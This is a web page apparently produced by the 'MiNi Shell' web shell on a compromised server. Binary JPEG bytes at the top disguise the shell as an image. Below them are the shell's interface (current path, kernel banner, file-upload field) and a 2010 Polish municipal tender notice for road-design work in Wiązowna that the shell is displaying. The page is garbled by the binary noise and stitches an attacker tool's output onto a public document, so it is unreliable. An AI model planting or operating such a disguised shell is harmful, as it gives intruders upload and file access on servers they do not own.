JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/13038-N-2010.html

<p class="kh_header"><b>Wiązowna: Przebudowa ul. Lubelskiej w miejscowości Wiązowna wraz z chodnikami, ciągiem pieszo-rowerowym i odwodnieniem - Wykonanie dokumentacji projektowej.</b><br>
<b>Numer ogłoszenia: 13038 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiązowna , ul. Lubelska 59, 05-462 Wiązowna, woj. mazowieckie, tel. 022 7890128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> urzad@wiazowna.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Lubelskiej w miejscowości Wiązowna wraz z chodnikami, ciągiem pieszo-rowerowym i odwodnieniem - Wykonanie dokumentacji projektowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Wykonanie dokumentacji projektowej przebudowy ul. Lubelskiej (droga nr 721) w miejscowości Wiązowna wraz z chodnikami, ciągiem pieszo-rowerowym i odwodnieniem na odcinku od skrzyżowania z drogą krajową nr 17 do skrzyżowania z drogą powiatową Nr 2727W o długości 1300,00 mb .  

1.1.Przedmiot zamówienia obejmuje:
1.1. 1. Opracowanie, złożenie wniosków i uzyskanie w imieniu Mazowieckiego    Zarządu Dróg Wojewódzkich decyzji o ustaleniu lokalizacji drogi, dla której    opracowanie dokumentacji projektowej stanowi przedmiot niniejszego    zamówienia. Powyższe obejmie m.in. sporządzenie i uzyskanie wszystkich    koniecznych opracowań i dokumentów (opinii, map, koncepcji itp.), niezbędnych     do uzyskania w/w decyzji o lokalizacji drogi.
1.1.2. Opracowanie, złożenie wniosków i uzyskanie decyzji o środowiskowych    uwarunkowaniach zgody na realizację inwestycji. 
1.1.3. Uzyskanie warunków technicznych od firm branżowych na usunięcie kolizji     uzbrojenia podziemnego i naziemnego z projektowanym układem komunikacyjnym,
1.1.4. Opracowanie projektu budowlanego i wykonawczego, oddzielnie dla każdej branży. 
1.1.5. Projekty budowlane i projekty wykonawcze muszą uwzględniać następujące zagadnienia i wytyczne:
1.1.5.1.	przebudowę i budowę jezdni,
1.1.5.2.	przebudowę i budowę chodników oraz ciągów pieszo- rowerowych,
1.1.5.3.	przebudowę i budowę zatok postojowych,
1.1.5.4.	przebudowę i budowę zatok autobusowych wraz z przystankami       i wiatami,
1.1.5.5.	przebudowę i budowę zjazdów (na drogi powiatowe, gminne, dojazdowe i indywidualne),
1.1.5.6.	przebudowę i budowę odwodnienia drogi,
1.1.5.7.	budowę, przebudowę drogowych obiektów inżynierskich (przepusty       drogowe),
1.1.5.8.	zagospodarowanie terenu wraz z inwentaryzacją zieleni istniejącej,
1.1.5.9.	usunięcie kolizji infrastruktury technicznej,  w zakresie wynikającym        z art. 39 ust. 4 i 5 ustawy z dnia 21 marca 1985 r. o drogach publicznych        (Dz. U. z 2007 r. Nr 19 poz. 115 tekst jednolity z późn. zmianami),
1.1.5.10.	dane wyjściowe do projektowania drogi wydane przez  Mazowiecki        Zarząd Dróg Wojewódzkich,
1.1.5.11.	dokumentację opracowaną na zlecenie MZDW dotyczącą przebudowy mostu na rz. Mienia w m. Wiązowna (w posiadaniu MZDW).
1.1.5.12.	realizowaną obecnie kanalizację sanitarną na przedmiotowym odcinku       drogi (w zakresie ewentualnych kolizji),
1.1.5.13.	uzyskanie akceptacji Zamawiającego i zarządcy drogi dla zakresu        usuwania kolizji infrastruktury, określonej przez firmy branżowe oraz dla        zastosowanych rozwiązań projektowych,
1.1.5.14.	opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót. Powyższe opracowania muszą być wykonane zgodnie z Zaleceniami do Wykonania i Odbioru poszczególnych robót wydanymi przez GDDP i Instytut Badawczy Dróg i Mostów,
1.1.5.15.	opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia uwzględniającą specyfikę robót budowlanych, objętych projektem        stanowiącym przedmiot niniejszej umowy,
1.1.5.16.	opracowanie przedmiarów robót w układzie specyfikacyjnym (tzn.        kosztorysów ofertowych) z podziałem na poszczególne branże,
1.1.5.17.	opracowanie kosztorysów inwestorskich, dla w/w elementów z podziałem  na poszczególne branże.
2. Wykonawca-Projektant zobowiązany jest do wykonania przedmiotu zamówienia, w tym:
2.1. Projektów budowlanych - w ilości 6 egz. w wersji papierowej;
2.2. Projektów wykonawczych - w ilości 6 egz. w wersji papierowej;
2.3. Szczegółowych specyfikacji technicznych wykonania i odbioru robót - w ilości 3 egz. w wersji papierowej;
2.4. Przedmiarów robót, kosztorysów inwestorskich w ilości 2 egz. w wersji papierowej;
2.5. Oceny oddziaływania przedsięwzięcia na środowisko - zgodnie z obowiązującymi przepisami  -  jeżeli zostanie określony wymóg jej sporządzenia;
2.6. Kompletu dokumentacji projektowej w opracowaniu numerycznym na płycie CD:
     -Komplet dokumentacji w formacie PDF - w ilości 2 egz.;
      -Przedmiary i kosztorysy inwestorskie  - w ilości 2 egz.

3. Dokumentacja techniczna powinna: 
3.1. Zawierać opis techniczny, warunki techniczne wydane przez firmy branżowe, uzgodnienia oraz rysunki z podpisami projektantów wraz ze stronami tytułowymi;
3.2. W swej treści określać technologię robót, materiały, maszyny;
3.3. Określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii i maszyn;
3.4. Zawierać wytyczne do opracowania projektu organizacji ruchu na czas budowy;
3.5. Zawierać wykaz ewentualnych powierzchni gruntów wraz z numerami ewidencyjnymi działek do wykupu, niezbędnych do zrealizowania pełnego zakresu robót budowlanych;
3.6. W cenie ofertowej należy uwzględnić koszty uzyskania map do celów projektowych, koszty wszystkich uzgodnień, decyzji i wykonania badań niezbędnych do prawidłowego i kompletnego opracowania dokumentacji projektowej;

4. Wykonawca dokumentacji technicznej jest zobowiązany:
4.1. Do konsultowania i uzyskiwania akceptacji MZDW i Zamawiającego dla zastosowanych w przedmiotowej dokumentacji rozwiązań projektowych;
4.2. Wykonania dokumentacji projektowej na aktualnej mapie do celów projektowych,
4.3. Protokólarnego przekazania przedmiotu umowy Zamawiającemu, w jego siedzibie wraz z oświadczeniem, że dostarczone opracowania: 
4.3.1.     są wykonane zgodnie z umową, ofertą i SIWZ, obowiązującymi przepisami    techniczno-budowlanymi, normami;
4.3.2.	zostały wykonane w stanie kompletnym z punktu widzenia celu, któremu ma    służyć tzn. uzyskania decyzji pozwolenia na realizację inwestycji;
4.3.3.	stanowią opis przedmiotu zamówienia do przetargu na roboty budowlane    w oparciu o ustawę zamówieniach publicznych;
4.3.4.	stanowią podstawę do realizacji pełnego zakresu robót budowlanych    niezbędnych do użytkowania drogi zgodnie z przeznaczeniem;
4.4. Pisemne oświadczenie, o którym mowa wyżej, stanowi integralną część przedmiotu odbioru. 
4.5. Do usunięcia zgłoszonych przez Zamawiającego i MZDW ewentualnych wad i braków wykonanych opracowań w wyznaczonym przez nich terminie.
4.6. Wykonawca ponosi pełną odpowiedzialność za wady-błędy w opracowaniach projektowych, a w szczególności za błędy wynikające z niewłaściwej inwentaryzacji stanu istniejących wszelkich obiektów drogowych, inżynierskich i urządzeń infrastruktury oraz za błędy wynikające z niewłaściwej inwentaryzacji zjazdów w opracowanym projekcie,
4.7. W przypadku ujawnienia takich wad zarówno na etapie odbioru jak i na etapie wykonywania robót budowlanych, Wykonawca na własny koszt usunie wady poprzez opracowanie właściwych projektów łącznie z aktualizacją projektu stałej organizacji ruchu.
4.8. Sprawowanie oraz zakres nadzoru autorskiego sprawowanego nad realizacją przebudowy drogi stanowić będzie przedmiot odrębnego porozumienia zawartego pomiędzy Wykonawcą dokumentacji technicznej z Inwestorem tj. MZDW.

5. Dokumentację projektową należy wykonać zgodnie z:
5.1. Ustawą z dnia 07.07.1994 r. Prawo Budowlane (tekst jednolity), (Dz. U. Nr 156 z 2006 r. poz. 1118),
5.2. Rozporządzeniem Ministra Infrastruktury z dnia 03 lipca 2003 r. (Dz. U. Nr 120 z 2003 r. poz. 1133) w sprawie szczegółowego zakresu i formy projektu budowlanego, 
5.3. Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. Nr 202 z 2004 r. poz. 2072) w sprawie szczegółowego zakresu i formy dokumentacji projektowej,  specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu  funkcjonalno- użytkowego,
5.4. Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie sporządzania kosztorysu inwestorskiego (Dz. U. Nr 130 z 2004 r. poz. 1389),
5.5. Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie - (Dz. U. z 1999 r., Nr 43, poz. 430).
5.6. Z obowiązującymi Polskimi Normami ustalonymi przez Polski Komitet Normalizacyjny.
5.7. Z Ogólnymi Specyfikacjami Technicznymi Wykonania i Odbioru Robót wydanych przez Generalną Dyrekcję Dróg Publicznych, Generalną Dyrekcję dróg Krajowych i Autostrad oraz Branżowy Zakład Doświadczalny Dróg i Mostów.
5.8. Obowiązującymi normami oraz zasadami wiedzy technicznej,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Oferta winna być zabezpieczona wadium w wysokości 4. 000 zł (słownie: cztery tysiące złotych) 
2. Wadium musi być wniesione przed upływem terminu składania ofert. Wadium może być wniesione w jednej lub kilku następujących formach: 
a. pieniądzu przelewem na konto sum depozytowych Urzędu Gminy Wiązowna,        ul. Lubelska 59 Nr: 59 8001 0005 2003 0020 0592 0012 B.S. w Otwocku o/w      Wiązownie,
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c. gwarancjach bankowych,
d. gwarancjach ubezpieczeniowych;
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju     Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz.275).
3. Oryginał dowodu wniesienia wadium proszę złożyć w pok. 102 (I piętro Urzędu Gminy Wiązowna), natomiast kopię należy dołączyć do złożonej oferty. 
4. Zamawiający zwraca niezwłocznie wadium jeżeli:
a. upłynął termin związania ofertą,
b. zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
c. zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
5. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a. który wycofał ofertę przed upływem terminu składania ofert,
b. który został wykluczony z postępowania,
c. którego oferta została odrzucona.
6. Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie wykluczenia z postępowania, którego oferta została odrzucona, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. 
7. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego. Jeżeli   wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono  przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył  dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy p.z.p. lub pełnomocnictw, chyba że udowodni , że wynika to z przyczyn nieleżących po jego stronie.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim.
1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy:
1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.2.	 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
1.3.	Wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, co najmniej trzy projekty związane z projektowaniem budowy lub przebudowy ulic lub dróg, w zakresie odpowiadającym swoim rodzajem i wartością  przedmiotowi zamówienia o wartości wynoszącej minimum 120 tys. zł. brutto każdy, z  podaniem daty i   miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dokumentacja ta została wykonana z należytą starannością.
1.4.	dysponują osobami zdolnymi do wykonania niniejszego zamówienia posiadającymi uprawnienia budowlane do projektowania potwierdzone zaświadczeniem wydanym przez właściwą izbę z określonym w nim terminem ważności w specjalności: 
- drogowej bez ograniczeń wraz z wpisem na listę członków właściwej izby samorządu zawodowego, 
- instalacyjnej w zakresie sieci wraz z wpisem na listę członków właściwej izby samorządu zawodowego,
1.5.	 Posiadają ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
1.6.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego zgodnie z art. 24 ust. 1 i 2 ustawy.
1.7.	Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:
2.1.	Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę  spełnia - nie spełnia.
2.2.	Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem  Wykonawcy.  
3.	Zamawiający zawiadomi niezwłocznie wykonawcę o wykluczeniu z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne;
4.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
5.	Oferty będą oceniane pod względem formalnym w zakresie kompletności i zgodności z wymogami specyfikacji istotnych warunków zamówienia i ustawy Prawo zamówień publicznych.
6.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert.
7.	Zamawiający poprawi w ofercie:
7.1.	oczywiste omyłki pisarskie,
7.2.	oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,
7.3.	inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia, niepowodujące istotnych zmian w treści oferty - niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona. 
8.	Zamawiający odrzuca ofertę, jeżeli:
8.1.	jest niezgodna z ustawą Prawo zamówień publicznych,
8.2.	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
z zastrzeżeniem art. 87 ust.2 pkt. 3 ustawy,
8.3.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
8.4.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
8.5.	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
8.6.	zawiera błędy w obliczeniu ceny,
8.7.	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, 
8.8.	jest nieważna na podstawie odrębnych przepisów.
9.	W przypadku, gdy oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, Zamawiający zwróci się w formie pisemnej do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny.
10.	Zamawiający odrzuca ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdza, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Kompletna oferta powinna zawierać:
1. Wypełniony i podpisany formularz ofertowy - zgodnie z załącznikiem nr 1 do SIWZ. 
2. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności, oraz nie podlega wykluczeniu z postępowania należy do oferty załączyć: 
2.1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.2.	 oświadczenie o spełnieniu warunków udziału w postępowaniu oraz oświadczenie o nie podleganiu wykluczeniu z postępowania stanowiącym załącznik nr 2 do SIWZ.
2.3.	Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
3. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie należy do oferty załączyć:
3.1.	Wykaz wykonanych projektów w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech projektów związanych z budową lub przebudową ulic lub dróg, w zakresie odpowiadającym swoim rodzajem i wartością przedmiotowi zamówienia o wartości wynoszącej minimum 120 tys. zł. brutto każdy, z  podaniem daty i  miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dokumentacja ta została wykonana z należytą starannością zgodnie z formularzem stanowiącym zał. nr 3 do SIWZ potwierdzonych referencjami od Zamawiającego.
3.2.	 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wraz z dokumentami potwierdzającymi posiadanie uprawnień, jeśli ustawy nakładają obowiązek posiadania takich uprawnień oraz dokumenty potwierdzające przynależność do właściwej izby samorządu zawodowego, potwierdzone zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności, wg zał. nr 5 do SIWZ 
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 2 ppkt. 2.1., składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto likwidacji ani nie ogłoszono upadłości. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt. 2 ppkt. 2.1., zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
6.1.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
6.2.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Tłumaczenie nie jest wymagane, jeśli Zamawiający wyraził zgodę, w szczególnie uzasadnionych przypadkach na złożenie wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, oświadczeń, ofert oraz innych dokumentów również w jednym z języków powszechnie używanych w handlu międzynarodowym lub języku kraju, w którym zamówienie jest udzielane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.wiazowna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązowna ul. Lubelska 59, 05-462 Wiązowna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 11:00, miejsce: Urząd Gminy Wiązowna
ul. Lubelska 59, 05-462 Wiązowna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com